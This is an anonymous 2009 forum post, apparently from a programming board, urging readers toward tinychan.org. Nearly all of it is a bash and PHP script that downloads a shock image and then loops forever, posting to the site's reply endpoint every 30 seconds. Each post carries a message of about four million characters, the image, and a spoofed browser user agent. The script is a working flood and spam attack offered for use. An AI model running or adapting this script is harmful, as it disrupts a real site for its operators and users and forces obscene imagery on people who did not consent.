Name: Anonymous 2009-06-16 4:04
get in here /prog/
http://www.tinychan.org
http://www.tinychan.org
#!/bin/bash
if ! [ -f \>\<\".jpg ]
then
wget -O ./\>\<\".jpg http://www.w3bbo.com/forums/Goatse-Original_Ring.jpg
fi
while true; do
php -r '$ch = curl_init();
$char = ">";
for($i=0;$i<22;$i++) $char.=$char;
curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "gzip,deflate",
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9) Gecko/2008052906 Firefox/3.0",
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_COOKIESESSION => true,
CURLOPT_CONNECTTIMEOUT => 30,
CURLOPT_POST => true,
CURLOPT_URL => "http://www.tinychan.org/img/reply.php",
CURLOPT_POSTFIELDS => array("tfn"=>"1245334695",
"msg"=>$char,
"file"=>"@><\".jpg"),
CURLOPT_TIMEOUT => 120));
echo curl_exec($ch);'
sleep 30
done